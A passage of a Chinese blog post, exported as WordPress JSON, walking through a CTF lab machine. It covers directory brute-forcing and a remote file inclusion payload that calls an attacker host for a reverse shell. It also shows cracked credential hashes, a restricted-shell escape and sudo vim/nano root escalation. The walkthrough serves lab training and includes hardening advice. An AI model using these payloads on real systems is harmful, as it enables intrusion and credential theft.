\/><\/div><\/p>\n<p>\u8fd8\u662f\u51fa\u73b0\u4e86\u8fd9\u79cd\u4e8b\u60c5\u3002\u3002\u3002\u3002<\/p>\n<p>\u518d\u8c03\u5c0f\u4e00\u70b9\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.37.131:8080\/developmentsecretpage\/  -t 5 -x html,php,txt,zip<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024738.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024738.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193409792\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u786e\u5b9e\u4e0d\u662f\u901a\u8fc7\u626b\u63cf\u5f97\u5230\u4e1c\u897f\u7684\u3002\u3002\u3002\u3002<\/p>\n<p>\u56de\u5934\u627e\u529e\u6cd5\u7684\u65f6\u5019\u624d\u53d1\u73b0\u57288080\u7aef\u53e3\u5c31\u6697\u793a\u4e86\u53ef\u80fd\u542f\u52a8\u4e86<code>HIDS<\/code>\u3002<\/p>\n<blockquote>\n<p>HIDS\u5168\u79f0\u662fHost-based Intrusion Detection 
System\uff0c\u5373\u57fa\u4e8e\u4e3b\u673a\u578b\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u3002\u4f5c\u4e3a\u8ba1\u7b97\u673a\u7cfb\u7edf\u7684\u76d1\u89c6\u5668\u548c\u5206\u6790\u5668\uff0c\u5b83\u5e76\u4e0d\u4f5c\u7528\u4e8e\u5916\u90e8\u63a5\u53e3\uff0c\u800c\u662f\u4e13\u6ce8\u4e8e\u7cfb\u7edf\u5185\u90e8\uff0c\u76d1\u89c6\u7cfb\u7edf\u5168\u90e8\u6216\u90e8\u5206\u7684\u52a8\u6001\u7684\u884c\u4e3a\u4ee5\u53ca\u6574\u4e2a\u8ba1\u7b97\u673a\u7cfb\u7edf\u7684\u72b6\u6001\u3002<\/p>\n<\/blockquote>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024739.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024739.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193755317\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff01<\/p>\n<p>\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff0c\u53d1\u73b0\u62a5\u9519\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024740.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024740.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323193921472\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u67e5\u627e\u4e00\u4e0b\u8fd9\u4e2a\u62a5\u9519\u4fe1\u606f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024741.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024741.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194231466\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024742.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024742.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194254823\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5b83\u7684payload:<\/p>\n<pre><code 
class=\"language-bash\">\/[path]\/slogin_lib.inc.php?slogin_path=[remote_txt_shell]\n\/[path]\/slog_users.txt<\/code><\/pre>\n<pre><code class=\"language-text\">http:\/\/192.168.37.131:8080\/developmentsecretpage\/slogin_lib.inc.php?slogin_path=http:\/\/192.168.37.128:8888\/reverseShell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024743.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024743.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323194903982\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u7b2c\u4e00\u4e2a\uff08\u8fdc\u7a0b\u6587\u4ef6\u5305\u542b\uff09\u5931\u8d25\u4e86\uff0c\u7ee7\u7eed\u5c1d\u8bd5\u7b2c\u4e8c\u4e2a\uff08\u76f4\u63a5\u8bfb\u53d6\u7528\u6237\u51ed\u636e\u6587\u4ef6\uff09\u3002<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.37.131:8080\/developmentsecretpage\/slog_users.txt<\/code><\/pre>\n<pre><code class=\"language-apl\">admin, 3cb1d13bb83ffff2defe8d1443d3a0eb\nintern, 4a8a2b374f463b7aedbb44a066363b81\npatrick, 87e6d56ce79af90dbe07d387d3d0579e\nqiu, ee64497098d0926d198f54f6d5431f98<\/code><\/pre>\n<p>MD5 \u662f\u5355\u5411\u54c8\u5e0c\uff0c\u4e25\u683c\u8bf4\u4e0d\u80fd\u201c\u89e3\u5bc6\u201d\uff0c\u8fd9\u91cc\u662f\u628a\u54c8\u5e0c\u503c\u7834\u89e3\u8fd8\u539f\u6210\u660e\u6587\uff1a<\/p>\n<pre><code class=\"language-apl\">admin       \nintern      12345678900987654321\npatrick     P@ssw0rd25\nqiu         qiu<\/code><\/pre>\n<p>\u5c1d\u8bd5ssh\u767b\u5f55\u3002<\/p>\n<pre><code class=\"language-bash\">ssh intern@192.168.37.131<\/code><\/pre>\n<p>\u51fa\u73b0\u4e86\u4ee5\u4e0b\u62a5\u9519\uff1a<\/p>\n<pre><code class=\"language-text\">@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n@    WARNING: REMOTE HOST IDENTIFICATION HAS 
CHANGED!     @\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\nIT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!\nSomeone could be eavesdropping on you right now (man-in-the-middle attack)!\nIt is also possible that a host key has just been changed.\nThe fingerprint for the ED25519 key sent by the remote host is\nSHA256:gCZ6+ixH4Qe19wr8iDYUTaofDOf16k4ccCQ68NZ08yM.\nPlease contact your system administrator.\nAdd correct host key in \/home\/kali\/.ssh\/known_hosts to get rid of this message.\nOffending ECDSA key in \/home\/kali\/.ssh\/known_hosts:33\n  remove with:\n  ssh-keygen -f &#039;\/home\/kali\/.ssh\/known_hosts&#039; -R &#039;192.168.37.131&#039;\nHost key for 192.168.37.131 has changed and you have requested strict checking.\nHost key verification failed.<\/code><\/pre>\n<p>\u662f\u56e0\u4e3a\u4e4b\u524d\u6709\u4e2a\u9776\u573a\u7684\u5730\u5740\uff08IP\uff09\u548c\u8fd9\u4e2a\u4e00\u6a21\u4e00\u6837\uff0cknown_hosts \u91cc\u5b58\u4e0b\u4e86\u65e7\u7684\u4e3b\u673a\u5bc6\u94a5\uff0c\u4f7f\u7528\u547d\u4ee4<code>ssh-keygen -f &#039;\/home\/kali\/.ssh\/known_hosts&#039; -R &#039;192.168.37.131&#039;<\/code>\u5220\u6389\u5c31\u884c\u4e86\u3002\u771f\u5b9e\u73af\u5883\u91cc\u5e94\u5148\u6838\u5bf9\u4e3b\u673a\u5bc6\u94a5\u6307\u7eb9\u518d\u5220\u9664\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024744.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024744.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323201323393\" style=\"zoom: 50%;\" 
\/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u6269\u5c55\u4e00\u4e0b<\/h3>\n<p>\u867d\u7136\u8fde\u63a5\u4e0a\u4e86\uff0c\u4f46\u662f\u662f\u4e00\u4e2a\u53d7\u9650\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">intern:~$ ?\ncd  clear  echo  exit  help  ll  lpath  ls<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5207\u6362\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6269\u5c55\u4e00\u4e0b\u3002<\/p>\n<pre><code class=\"language-bash\">intern:~$ echo os.system(&quot;\/bin\/bash&quot;)\nintern@development:~$ whoami;id\nintern\nuid=1002(intern) gid=1006(intern) groups=1006(intern)\nintern@development:~$ ls\naccess  local.txt  work.txt\nintern@development:~$ cat local.txt\nCongratulations on obtaining a user shell. :)\nintern@development:~$ cat work.txt\n1.      Tell Patrick that shoutbox is not working. We need to revert to the old method to update David about shoutbox. For new, we will use the old director&#039;s landing page.\n\n2.      Patrick&#039;s start of the third year in this company!\n\n3.      
Attend the meeting to discuss if password policy should be relooked at.\nintern@development:~$ sudo -l\n[sudo] password for intern: \nSorry, user intern may not run sudo on development.<\/code><\/pre>\n<h3>\u5207\u6362\u7528\u6237<\/h3>\n<pre><code class=\"language-bash\">intern@development:~$ su patrick\nPassword: \npatrick@development:\/home\/intern$ whoami\npatrick\npatrick@development:\/home\/intern$ id\nuid=1001(patrick) gid=1005(patrick) groups=1005(patrick),108(lxd)\npatrick@development:\/home\/intern$ sudo -l\nMatching Defaults entries for patrick on development:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser patrick may run the following commands on development:\n    (ALL) NOPASSWD: \/usr\/bin\/vim\n    (ALL) NOPASSWD: \/bin\/nano<\/code><\/pre>\n<h3>vim\u63d0\u6743<\/h3>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/vim\/\">https:\/\/gtfobins.github.io\/gtfobins\/vim\/<\/a><\/p>\n<p>sudoers \u5141\u8bb8 patrick \u514d\u5bc6\u7801\u4ee5\u4efb\u610f\u7528\u6237\u8eab\u4efd\u8fd0\u884c vim \u548c nano\uff0c\u800c\u8fd9\u4e24\u4e2a\u7f16\u8f91\u5668\u90fd\u53ef\u4ee5\u6267\u884c\u5916\u90e8\u547d\u4ee4\uff0c\u76f8\u5f53\u4e8e\u76f4\u63a5\u7ed9\u4e86 root \u6743\u9650\u3002\u52a0\u56fa\u65f6\u5e94\u5220\u9664\u8fd9\u7c7b\u89c4\u5219\uff0c\u9700\u8981\u7f16\u8f91\u6587\u4ef6\u65f6\u6539\u7528 sudoedit\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024745.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024745.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202013469\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024747.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024747.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202106017\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>nano\u63d0\u6743<\/h3>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/nano\/\">https:\/\/gtfobins.github.io\/gtfobins\/nano\/<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024748.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024748.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202157480\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sudo nano\nctrl+r ctrl+x\nreset; sh 1&gt;&amp;0 2&gt;&amp;0<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024749.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  
decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403232024749.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240323202356523\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>devt-improved \u770b\u6765\u6ca1\u9519\u4e86 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.37.13 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-448","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=448"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions"}],"predecessor-version":[{"id":451,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/448\/revisions\/451"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=448"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=448"}],"curies":[{"name":"wp"
,"href":"https:\/\/api.w.org\/{rel}","templated":true}]}}